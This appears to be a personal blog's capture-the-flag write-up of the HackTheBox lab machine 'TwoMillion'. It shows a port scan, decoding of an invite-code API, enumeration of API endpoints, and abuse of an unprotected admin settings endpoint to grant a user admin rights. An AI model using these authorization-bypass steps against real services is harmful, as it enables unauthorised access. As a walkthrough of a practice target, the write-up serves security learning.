<!doctype html>














<!-- `site.alt_lang` can specify a language different from the UI -->
<html lang="en" data-mode="dark">
  <head>
  <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
  <meta name="theme-color" media="(prefers-color-scheme: light)" content="#f7f7f7">
  <meta name="theme-color" media="(prefers-color-scheme: dark)" content="#1b1b1e">
  <meta name="mobile-web-app-capable" content="yes">
  <meta name="apple-mobile-web-app-status-bar-style" content="black-translucent">
  <meta
    name="viewport"
    content="width=device-width, user-scalable=no initial-scale=1, shrink-to-fit=no, viewport-fit=cover"
  ><!-- Setup Open Graph image -->

  

  <!-- Begin Jekyll SEO tag v2.8.0 -->
<meta name="generator" content="Jekyll v4.3.4" />
<meta property="og:title" content="HackTheBox - TwoMillion" />
<meta property="og:locale" content="en" />
<meta name="description" content="Writeup for HackTheBox Machine ‘TwoMillion’" />
<meta property="og:description" content="Writeup for HackTheBox Machine ‘TwoMillion’" />
<link rel="canonical" href="https://p4wnda.github.io/blog/posts/hackthebox-TwoMillion/" />
<meta property="og:url" content="https://p4wnda.github.io/blog/posts/hackthebox-TwoMillion/" />
<meta property="og:site_name" content="p4wnda.dev" />
<meta property="og:image" content="https://p4wnda.github.io/blog/assets/img/hackthebox/twoMillion/twoMillion_logo.png" />
<meta property="og:image:alt" content="HackTheBox TwoMillion Logo" />
<meta property="og:type" content="article" />
<meta property="article:published_time" content="2025-12-22T12:00:00+02:00" />
<meta name="twitter:card" content="summary_large_image" />
<meta property="twitter:image" content="https://p4wnda.github.io/blog/assets/img/hackthebox/twoMillion/twoMillion_logo.png" />
<meta name="twitter:image:alt" content="HackTheBox TwoMillion Logo" />
<meta property="twitter:title" content="HackTheBox - TwoMillion" />
<script type="application/ld+json">
{"@context":"https://schema.org","@type":"BlogPosting","dateModified":"2025-12-22T22:49:20+02:00","datePublished":"2025-12-22T12:00:00+02:00","description":"Writeup for HackTheBox Machine ‘TwoMillion’","headline":"HackTheBox - TwoMillion","image":{"alt":"HackTheBox TwoMillion Logo","url":"https://p4wnda.github.io/blog/assets/img/hackthebox/twoMillion/twoMillion_logo.png","@type":"imageObject"},"mainEntityOfPage":{"@type":"WebPage","@id":"https://p4wnda.github.io/blog/posts/hackthebox-TwoMillion/"},"url":"https://p4wnda.github.io/blog/posts/hackthebox-TwoMillion/"}</script>
<!-- End Jekyll SEO tag -->


  <title>HackTheBox - TwoMillion | p4wnda.dev</title>

  <!--
  The Favicons for Web, Android, Microsoft, and iOS (iPhone and iPad) Apps
  Generated by: https://realfavicongenerator.net/
-->



<link rel="icon" type="image/png" href="/blog/assets/img/favicons/favicon-96x96.png" sizes="96x96">
<link rel="icon" type="image/svg+xml" href="/blog/assets/img/favicons/favicon.svg">
<link rel="shortcut icon" href="/blog/assets/img/favicons/favicon.ico">
<link rel="apple-touch-icon" sizes="180x180" href="/blog/assets/img/favicons/apple-touch-icon.png">

  <link rel="manifest" href="/blog/assets/img/favicons/site.webmanifest">



  <!-- Resource Hints -->
  
    
      
        <link rel="preconnect" href="https://fonts.googleapis.com" >
      
        <link rel="dns-prefetch" href="https://fonts.googleapis.com" >
      
    
      
        <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
      
        <link rel="dns-prefetch" href="https://fonts.gstatic.com" >
      
    
      
        <link rel="preconnect" href="https://cdn.jsdelivr.net" >
      
        <link rel="dns-prefetch" href="https://cdn.jsdelivr.net" >
      
    
  

  <!-- Bootstrap -->
  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.3.8/dist/css/bootstrap.min.css">
  

  <!-- Theme style -->
  <link rel="stylesheet" href="/blog/assets/css/jekyll-theme-chirpy.css">

  <!-- Web Font -->
  <link rel="stylesheet" href="https://fonts.googleapis.com/css2?family=Lato:wght@300;400&family=Source+Sans+Pro:wght@400;600;700;900&display=swap">

  <!-- Font Awesome Icons -->
  <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@7.2.0/css/all.min.css">

  <!-- 3rd-party Dependencies -->

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/tocbot@4.36.4/dist/tocbot.min.css">
  

  
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.min.css">
  

  
    <!-- Image Popup -->
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/glightbox@3.3.0/dist/css/glightbox.min.css">
  

  <!-- Scripts -->

  <script src="/blog/assets/js/dist/theme.min.js"></script>

  <!-- JS selector for site. -->

<!-- commons -->



<!-- layout specified -->


  

  
    <!-- image lazy-loading & popup & clipboard -->
    
  















  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  

  
    

    

  



  <script defer src="https://cdn.jsdelivr.net/combine/npm/simple-jekyll-search@1.10.0/dest/simple-jekyll-search.min.js,npm/loading-attribute-polyfill@2.1.1/dist/loading-attribute-polyfill.umd.min.js,npm/glightbox@3.3.0/dist/js/glightbox.min.js,npm/clipboard@2.0.11/dist/clipboard.min.js,npm/dayjs@1.11.20/dayjs.min.js,npm/dayjs@1.11.20/locale/en.js,npm/dayjs@1.11.20/plugin/relativeTime.js,npm/dayjs@1.11.20/plugin/localizedFormat.js,npm/tocbot@4.36.4/dist/tocbot.min.js"></script>







<script defer src="/blog/assets/js/dist/post.min.js"></script>


  <!-- MathJax -->
  <script src="/blog/assets/js/data/mathjax.js"></script>
  <script async src="https://cdnjs.cloudflare.com/polyfill/v3/polyfill.min.js?features=es6"></script>
  <script id="MathJax-script" async src="https://cdn.jsdelivr.net/npm/mathjax@3.2.2/es5/tex-chtml.js"></script>


<!-- Pageviews -->

  

  



  

  <!-- A placeholder to allow defining custom metadata -->

</head>


  <body>
    <!-- The Side Bar -->

<aside aria-label="Sidebar" id="sidebar" class="d-flex flex-column align-items-end">
  <header class="profile-wrapper">
    <a href="/blog/" id="avatar" class="rounded-circle"><img src="https://avatars.githubusercontent.com/u/182892377?v=4" width="112" height="112" alt="avatar" onerror="this.style.display='none'"></a>

    <a class="site-title d-block" href="/blog/">p4wnda.dev</a>
    <p class="site-subtitle fst-italic mb-0">guy collecting malware as a hobby</p>
  </header>
  <!-- .profile-wrapper -->

  <nav class="flex-column flex-grow-1 w-100 ps-0">
    <ul class="nav">
      <!-- home -->
      <li class="nav-item">
        <a href="/blog/" class="nav-link">
          <i class="fa-fw fas fa-home"></i>
          <span>HOME</span>
        </a>
      </li>
      <!-- the real tabs -->
      
        <li class="nav-item">
          <a href="/blog/categories/" class="nav-link">
            <i class="fa-fw fas fa-stream"></i>
            

            <span>CATEGORIES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/blog/tags/" class="nav-link">
            <i class="fa-fw fas fa-tags"></i>
            

            <span>TAGS</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/blog/archives/" class="nav-link">
            <i class="fa-fw fas fa-archive"></i>
            

            <span>ARCHIVES</span>
          </a>
        </li>
        <!-- .nav-item -->
      
        <li class="nav-item">
          <a href="/blog/about/" class="nav-link">
            <i class="fa-fw fas fa-info-circle"></i>
            

            <span>ABOUT</span>
          </a>
        </li>
        <!-- .nav-item -->
      
    </ul>
  </nav>

  <div class="sidebar-bottom d-flex flex-wrap  align-items-center w-100">
    

    

      
        <a
          href="https://github.com/p4wnda"
          aria-label="github"
          

          
            target="_blank"
            
          

          

          
            rel="noopener noreferrer"
          
        >
          <i class="fab fa-github"></i>
        </a>
      
    

      
        <a
          href="javascript:location.href = 'mailto:' + ['p4wnda','gmail.com'].join('@')"
          aria-label="email"
          

          

          

          
        >
          <i class="fas fa-envelope"></i>
        </a>
      
    
  </div>
  <!-- .sidebar-bottom -->
</aside>
<!-- #sidebar -->


    <div id="main-wrapper" class="d-flex justify-content-center">
      <div class="container d-flex flex-column px-xxl-5">
        <!-- The Top Bar -->

<header id="topbar-wrapper" class="flex-shrink-0" aria-label="Top Bar">
  <div
    id="topbar"
    class="d-flex align-items-center justify-content-between px-lg-3 h-100"
  >
    <nav id="breadcrumb" aria-label="Breadcrumb">
      

      
        
          
            <span>
              <a href="/blog/">Home</a>
            </span>

          
        
          
        
          
            
              <span>HackTheBox - TwoMillion</span>
            

          
        
      
    </nav>
    <!-- endof #breadcrumb -->

    <button type="button" id="sidebar-trigger" class="btn btn-link" aria-label="Sidebar">
      <i class="fas fa-bars fa-fw"></i>
    </button>

    <div id="topbar-title">
      Post
    </div>

    <button type="button" id="search-trigger" class="btn btn-link" aria-label="Search">
      <i class="fas fa-search fa-fw"></i>
    </button>

    <search id="search" class="align-items-center ms-3 ms-lg-0">
      <i class="fas fa-search fa-fw"></i>
      <input
        class="form-control"
        id="search-input"
        type="search"
        aria-label="search"
        autocomplete="off"
        placeholder="Search..."
      >
    </search>
    <button type="button" class="btn btn-link text-decoration-none" id="search-cancel">Cancel</button>
  </div>
</header>


        <div class="row flex-grow-1">
          <main aria-label="Main Content" class="col-12 col-lg-11 col-xl-9 px-md-4">
            
              <!-- Refactor the HTML structure -->



<!--
  In order to allow a wide table to scroll horizontally,
  we suround the markdown table with `<div class="table-wrapper">` and `</div>`
-->



<!--
  Fixed kramdown code highlight rendering:
  https://github.com/penibelst/jekyll-compress-html/issues/101
  https://github.com/penibelst/jekyll-compress-html/issues/71#issuecomment-188144901
-->



<!-- Change the icon of checkbox -->



<!-- Handle images -->




  
  

  
    
      
      
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  
    

    
    

    

    
    

    
    
    

    
      

      
      
      

      
    
      

      
      
      

      
    

    <!-- take out classes -->
    

    

    
    

    

    
      
    

    <!-- lazy-load images -->
    

    
      <!-- make sure the `<img>` is wrapped by `<a>` -->
      

      
        <!-- create the image wrapper -->
        

        
        
      
    

    <!-- combine -->
    
  

  


<!-- Add header for code snippets -->



<!-- Create heading anchors -->





  
  

  
    
    

    
      
        
        
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    
      

      
      

      
      
      

      
    

    
  

  
  

  

  
  

  

  
  

  




<!-- return -->










<article class="px-1" data-toc="true">
  <header>
    <h1 data-toc-skip>HackTheBox - TwoMillion</h1>
    
      <p class="post-desc fw-light mb-4">Writeup for HackTheBox Machine 'TwoMillion'</p>
    

    <div class="post-meta text-muted">
      <!-- published date -->
      <span>
        Posted
        <!--
  Date format snippet
  See: ${JS_ROOT}/modules/components/locale-datetime.js
-->




<time
  
  data-ts="1766397600"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Dec 22, 2025
</time>

      </span>

      <!-- lastmod date -->
      
        <span>
          Updated
          <!--
  Date format snippet
  See: ${JS_ROOT}/modules/components/locale-datetime.js
-->




<time
  
  data-ts="1766436560"
  data-df="ll"
  
    data-bs-toggle="tooltip" data-bs-placement="bottom"
  
>
  Dec 22, 2025
</time>

        </span>
      

      
        
        
        

        

        <div class="mt-3 mb-3">
          <a href="/blog/assets/img/hackthebox/twoMillion/twoMillion_logo.png" class="popup img-link preview-img shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/twoMillion_logo.png"  alt="HackTheBox TwoMillion Logo" width="1200" height="630"  loading="lazy"></a><figcaption class="text-center pt-2 pb-2">HackTheBox TwoMillion Logo</figcaption></div>
      

      <div class="d-flex justify-content-between">
        <!-- author(s) -->
        <span>
          

          By

          <em>
            
              <a href="https://github.com/p4wnda">p4wnda</a>
            
          </em>
        </span>

        <div>
          <!-- pageviews -->
          

          <!-- read time -->
          <!-- Calculate the post's reading time, and display the word count in tooltip -->



<!-- words per minute -->










<!-- return element -->
<span
  class="readtime"
  data-bs-toggle="tooltip"
  data-bs-placement="bottom"
  title="1303 words"
>
  <em>7 min</em> read</span>

        </div>
      </div>
    </div>
  </header>

  
    <div id="toc-bar" class="d-flex align-items-center justify-content-between invisible">
      <span class="label text-truncate">HackTheBox - TwoMillion</span>
      <button type="button" class="toc-trigger btn me-1">
        <i class="fa-solid fa-list-ul fa-fw"></i>
      </button>
    </div>

    <button id="toc-solo-trigger" type="button" class="toc-trigger btn btn-outline-secondary btn-sm">
      <span class="label ps-2 pe-1">Contents</span>
      <i class="fa-solid fa-angle-right fa-fw"></i>
    </button>

    <dialog id="toc-popup" class="p-0">
      <div class="header d-flex flex-row align-items-center justify-content-between">
        <div class="label text-truncate py-2 ms-4">HackTheBox - TwoMillion</div>
        <button id="toc-popup-close" type="button" class="btn mx-1 my-1 opacity-75">
          <i class="fas fa-close"></i>
        </button>
      </div>
      <div id="toc-popup-content" class="px-4 py-3 pb-4"></div>
    </dialog>
  

  <div class="content">
    <h2 id="overview"><span class="me-2">Overview</span><a href="#overview" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>TwoMillion is an easy-rated Linux machine on HackTheBox that focuses heavily on API abuse, broken authorization, and input validation flaws, followed by a real-world Linux kernel privilege escalation. It is also the box released to celebrate two million users on HackTheBox. Congrats.</p>

<h2 id="tools-and-setup"><span class="me-2">Tools and Setup</span><a href="#tools-and-setup" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>Tools used in this Box were: <code class="language-plaintext highlighter-rouge">nmap</code>,<code class="language-plaintext highlighter-rouge">Burp Suite</code>,<code class="language-plaintext highlighter-rouge">curl</code>,<code class="language-plaintext highlighter-rouge">ssh</code>,<code class="language-plaintext highlighter-rouge">scp</code>, and a Linux kernel exploit (CVE-2023-0386)</p>

<h2 id="initial-reconnaissance"><span class="me-2">Initial Reconnaissance</span><a href="#initial-reconnaissance" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>After obtaining the target IP, I started with a full TCP scan:</p>
<div class="language-bash highlighter-rouge"><div class="code-header">
        <span data-label-text="Shell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>nmap <span class="nt">-p-</span> <span class="nt">-Pn</span> <span class="nv">$target</span> <span class="nt">-v</span> <span class="nt">-T5</span> <span class="nt">--min-rate</span> 1500 <span class="nt">--max-retries</span> 3 <span class="nt">--open</span> <span class="nt">-oN</span> nmap_ports.txt
</pre></td></tr></tbody></table></code></div></div>
<p>This revealed two open ports. Since port 80 was open, I focused on web enumeration.</p>
<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre>PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
</pre></td></tr></tbody></table></code></div></div>
<p>When opening the IP address on port 80, we get redirected to <code class="language-plaintext highlighter-rouge">2million.htb</code>. After adding this to the <code class="language-plaintext highlighter-rouge">/etc/hosts</code> file and opening it again, we are greeted with the old HackTheBox look (not that I’ve ever seen that, but I checked via Web Archive ;)).
<a href="/blog/assets/img/hackthebox/twoMillion/OldHackTheBox.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/OldHackTheBox.png" alt="Old HackTheBox Page" loading="lazy"></a></p>

<p>After looking around the page a bit I then saw the <code class="language-plaintext highlighter-rouge">http://2million.htb/invite</code> which had the text <code class="language-plaintext highlighter-rouge">Feel free to hack your way in :)</code>. This looked like the right place to start digging. At first I tried randomly putting in characters for the Invite Code. But this did not seem to work.
<a href="/blog/assets/img/hackthebox/twoMillion/invalid_code.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/invalid_code.png" alt="Old HackTheBox Page" loading="lazy"></a></p>

<p>So the first step is to get a valid invite code.</p>

<h2 id="getting-the-invite-code"><span class="me-2">Getting the Invite Code</span><a href="#getting-the-invite-code" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>While inspecting requests in Burp Suite, I discovered an obfuscated JavaScript file: <code class="language-plaintext highlighter-rouge">inviteapi.min.js</code>. After de-obfuscating it, the logic revealed an API endpoint.</p>

<p>Before:
<a href="/blog/assets/img/hackthebox/twoMillion/inviteapi_js.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/inviteapi_js.png" alt="Obfuscated JavaScript" loading="lazy"></a>
After:
<a href="/blog/assets/img/hackthebox/twoMillion/inviteapi_js_clean.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/inviteapi_js_clean.png" alt="Deobfuscated JavaScript" loading="lazy"></a>
Here we can see that we need to send a POST request to the <code class="language-plaintext highlighter-rouge">/api/v1/invite/how/to/generate</code> endpoint.
After successfully requesting this endpoint, we get an “encrypted” response back. We can already see that it was encrypted via <code class="language-plaintext highlighter-rouge">ROT13</code>
<a href="/blog/assets/img/hackthebox/twoMillion/ROT13_Encrypted.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/ROT13_Encrypted.png" alt="ROT 13 encrypted Response" loading="lazy"></a>
So this is super easy to decrypt because encrypting something with <code class="language-plaintext highlighter-rouge">ROT13</code> means you can decrypt it with <code class="language-plaintext highlighter-rouge">ROT13</code> as well because ROT13 shifts each letter by 13 positions, so applying it twice results in a full rotation back to the original text. <code class="language-plaintext highlighter-rouge">ROT13</code> is not really an encryption its just a substitution cipher with fixed parameters.
<a href="/blog/assets/img/hackthebox/twoMillion/ROT13_decrypted.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/ROT13_decrypted.png" alt="ROT 13 encrypted Response" loading="lazy"></a>
this reveals another Endpoint <code class="language-plaintext highlighter-rouge">/api/v1/invite/generate</code>. Opening this reveals the invite code encoded as <code class="language-plaintext highlighter-rouge">base64</code>.
<a href="/blog/assets/img/hackthebox/twoMillion/InviteGenerateEndpoint.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/InviteGenerateEndpoint.png" alt="ROT 13 decrypted Response" loading="lazy"></a>
And with a little decoding magic, we now got our invite code.
<a href="/blog/assets/img/hackthebox/twoMillion/decodeb64_invitecode.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/decodeb64_invitecode.png" alt="Base64 Decode" loading="lazy"></a></p>

<h2 id="further-enumeration"><span class="me-2">Further Enumeration</span><a href="#further-enumeration" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h2>
<p>After creating an account with the invite code, I explored the authenticated area at <code class="language-plaintext highlighter-rouge">2million.htb/home/</code>. Most links did not appear to work, which was visible by hovering over them and checking the target URL in the browser. One endpoint that seemed valid was <code class="language-plaintext highlighter-rouge">/home/access</code>, where a VPN configuration file could be generated.
<a href="/blog/assets/img/hackthebox/twoMillion/VPN_Generate_User.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/VPN_Generate_User.png" alt="Home/Access" loading="lazy"></a>
I added the domain to the <code class="language-plaintext highlighter-rouge">/etc/hosts</code> file and tried to connect, but this did not seem to work.</p>

<p>I was stuck here for a while and then decided to check out what other endpoints there are. As we saw we were able to generate the VPN File via <code class="language-plaintext highlighter-rouge">api/v1/user/vpn/generate</code>.
I did this by starting from the known endpoint <code class="language-plaintext highlighter-rouge">api/v1/user/vpn/generate</code>, I systematically removed path segments and sent requests to each resulting URL, allowing me to enumerate valid API endpoints based on successful responses. This then revealed all the API endpoints with <code class="language-plaintext highlighter-rouge">api/v1</code>.
<a href="/blog/assets/img/hackthebox/twoMillion/API-Endpoints.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/API-Endpoints.png" alt="All API Endpoints" loading="lazy"></a>
This was quite interesting as it showed me a few more Endpoints I did not know before. Especially the ones under <code class="language-plaintext highlighter-rouge">/admin/</code>.
One interesting endpoint was <code class="language-plaintext highlighter-rouge">api/v1/user/auth</code>, which returns whether the current user has administrative privileges via the <code class="language-plaintext highlighter-rouge">is_admin</code> field.
<a href="/blog/assets/img/hackthebox/twoMillion/api_user_auth.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/api_user_auth.png" alt="User Auth Check" loading="lazy"></a>
Based on this, I tried registering a new account while adding <code class="language-plaintext highlighter-rouge">"is_admin"</code> to the POST body. My first attempt included quotation marks, which I later realized were part of the JSON syntax and therefore incorrect.
<a href="/blog/assets/img/hackthebox/twoMillion/register_new_account_with_isAdmin.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/register_new_account_with_isAdmin.png" alt="Register new Account" loading="lazy"></a>
After correcting this to <code class="language-plaintext highlighter-rouge">is_admin=1</code>, I registered a new account and checked the result again using <code class="language-plaintext highlighter-rouge">api/v1/user/auth</code>. The account was still not an administrator, indicating that this approach does not work.
The next endpoint I tested was <code class="language-plaintext highlighter-rouge">/api/v1/admin/settings/update</code>. This one looked promising.
So I tried to “upgrade” my Account to an Administrator account via this Endpoint. The request reached the endpoint, but the server rejected it because the Content-Type header was missing. The API expects JSON, so it returned <code class="language-plaintext highlighter-rouge">Invalid content type</code>.
<a href="/blog/assets/img/hackthebox/twoMillion/invalid_content_type.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/invalid_content_type.png" alt="Invalid Content Type" loading="lazy"></a>
After adding the Header and sending the Request again I got the response that the Parameter “email” was missing. 
<a href="/blog/assets/img/hackthebox/twoMillion/parameter_missing.png" class="popup img-link shimmer"><img src="/blog/assets/img/hackthebox/twoMillion/parameter_missing.png" alt="Missing Parameter" loading="lazy"></a>
Then after adding that missing parameter we finally got the response we want. We now have an Administrator Account.
